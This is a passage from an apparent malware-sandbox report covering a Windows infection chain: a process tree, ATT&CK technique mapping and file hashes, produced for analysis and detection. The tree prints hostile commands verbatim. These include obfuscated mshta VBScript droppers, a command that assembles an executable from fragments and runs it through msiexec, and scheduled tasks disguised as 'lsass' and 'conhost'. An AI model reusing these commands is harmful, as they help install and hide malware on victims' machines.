                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --mojo-platform-channel-handle=1872 /prefetch:8
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:224
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:6436
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3228 /prefetch:2
                                                                                                                                                              7⤵
                                                                                                                                                                PID:7532
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --mojo-platform-channel-handle=3464 /prefetch:8
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:5580
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --mojo-platform-channel-handle=3408 /prefetch:8
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:7552
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --mojo-platform-channel-handle=3664 /prefetch:8
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:7924
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --mojo-platform-channel-handle=3844 /prefetch:8
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:972
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --mojo-platform-channel-handle=3572 /prefetch:8
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5016
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ligr-game.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5996
                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\AMYk3R1fUUc3pXzPQHc8YhaC.exe
                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\AMYk3R1fUUc3pXzPQHc8YhaC.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5116
                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\AMYk3R1fUUc3pXzPQHc8YhaC.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\AMYk3R1fUUc3pXzPQHc8YhaC.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4184
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\AMYk3R1fUUc3pXzPQHc8YhaC.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\AMYk3R1fUUc3pXzPQHc8YhaC.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4444
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                          8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:3856
                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5128
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:5384
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:6164
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:5740
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:6712
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:6512
                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                              msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:6108
                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                        taskkill -im "AMYk3R1fUUc3pXzPQHc8YhaC.exe" -F
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:5460
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\taGpyjx1Le2Hf_LUTY99fRDh.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\taGpyjx1Le2Hf_LUTY99fRDh.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                  PID:4372
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\bopomofo\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:4408
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Documents and Settings\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:5624
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks.exe /create /tn "8A_szTOpS6jTWIShbsMC5wCa" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\S04VPAnL1aYLSLFTPAUd_fRY\8A_szTOpS6jTWIShbsMC5wCa.exe'" /rl HIGHEST /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:6428
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\A000.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\A000.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:2212
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\A000.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\A000.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                  PID:2232
                                                                                                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:5720
                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:6708
                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                PID:6520
                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:872
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\110A.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\110A.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:4476
                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                PID:5176
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2B4A.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2B4A.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                PID:6044
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3A20.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3A20.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5684
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:4616
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:6944
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:7264
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8033.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8033.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:7344
                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:7884
                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                    PID:3092
                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 6213F81950C319E856506D368D398527 C
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      PID:6336
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:7952
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:5192
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    schtasks.exe /create /tn "cutm3" /sc ONLOGON /tr "'C:\Program Files (x86)\Company\NewProduct\inst3\cutm3.exe'" /rl HIGHEST /f
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:5384
                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                    PID:6964
                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:8120
                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                      PID:5276
                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5612

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                      Execution

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Persistence

                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                      2
                                                                                                                                                                                      T1031

                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                      1
                                                                                                                                                                                      T1060

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                      4
                                                                                                                                                                                      T1112

                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                      1
                                                                                                                                                                                      T1089

                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                      2
                                                                                                                                                                                      T1497

                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                      1
                                                                                                                                                                                      T1130

                                                                                                                                                                                      Credential Access

                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                      2
                                                                                                                                                                                      T1081

                                                                                                                                                                                      Discovery

                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1518

                                                                                                                                                                                      Query Registry

                                                                                                                                                                                      8
                                                                                                                                                                                      T1012

                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                      2
                                                                                                                                                                                      T1497

                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                      7
                                                                                                                                                                                      T1082

                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                      2
                                                                                                                                                                                      T1120

                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1018

                                                                                                                                                                                      Collection

                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                      2
                                                                                                                                                                                      T1005

                                                                                                                                                                                      Command and Control

                                                                                                                                                                                      Web Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1102

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        17f6f3213a5a5d2fb1ef8793081c5ddd

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        4601bd223fd7c52b12bc186ec9a0eb94167aaebb

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        17f6f3213a5a5d2fb1ef8793081c5ddd

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        4601bd223fd7c52b12bc186ec9a0eb94167aaebb

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        6987f229daf0e954b67d5dbf779150b3b5c8dc3e69f66fe7c41f875be7725994

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b640e80f1aec1302ad95f88b3fa10d16df39f9ecf498eadcd602bbd945550c8843393ef6176a2fc3120cf3db487edd400f3a633ef944faae5abcef67637d7276

                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        07e143efd03815a3b8c8b90e7e5776f0

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        07e143efd03815a3b8c8b90e7e5776f0

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        077314efef70cef8f43eeba7f1b8ba0e5e5dedc9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        32967e652530e7ac72841886cb07badcced11e1e725e2e85e1ee8046c4fe2149

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        79ed77bbcac3f84d846b4b02e1a50a197d857d4b1d6abd84a45393bb3c262768ab6f3952733a1ae6010978ab598842d9b7ac4be5a5b23c374a3d4796c87a38d6

                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        a41adbdafc72a86a7a74c494659954b4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d43696a0e3704a141fc0cf6a1098525c00ce882f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d6d48be25063b05a78a013810ef21ed4a64a2122f91fadcbaf609dee8cce6f7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        44a1bd50cf1bed0ef1adaf7839ae8549c752b9825f542daa51730019f8f3186af0c12621789668e8a083625b90680d804d8a7a7de8f46da2df5cb7550afd45d2

                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        a41adbdafc72a86a7a74c494659954b4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d43696a0e3704a141fc0cf6a1098525c00ce882f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d6d48be25063b05a78a013810ef21ed4a64a2122f91fadcbaf609dee8cce6f7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        44a1bd50cf1bed0ef1adaf7839ae8549c752b9825f542daa51730019f8f3186af0c12621789668e8a083625b90680d804d8a7a7de8f46da2df5cb7550afd45d2

                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                        MD5

                                                                                                                                                                                        54e9306f95f32e50ccd58af19753d929

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                        MD5

                                                                                                                                                                                        7f5a1d94e9974c0f88e556e17a5caaea

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        9426565e3340173c7b613495b1458f2d1935ab78

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        955d175aa1e860c0e71ecf6099af28db352adc1c8a2619795cfdffe3d895eeef

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        767489777c3e7227b3440f410542f9b7f57c9cee7db26bee4a1636f6eb7ede3ea3a262361fedcca189becf508be38233fe4309d696ee842a3ef43b018d017c84

                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                        MD5

                                                                                                                                                                                        e2d0004a5440d248aa8d8dda1d62c032

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        5bd6870d7746a8ad568c04314c04aa67f3beb1e6

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        60829b6f430a9d8aee9e3ec5eca525b758c5f82939646ca78f85b5c258a297cf

                                                                                                                                                                                        SHA512

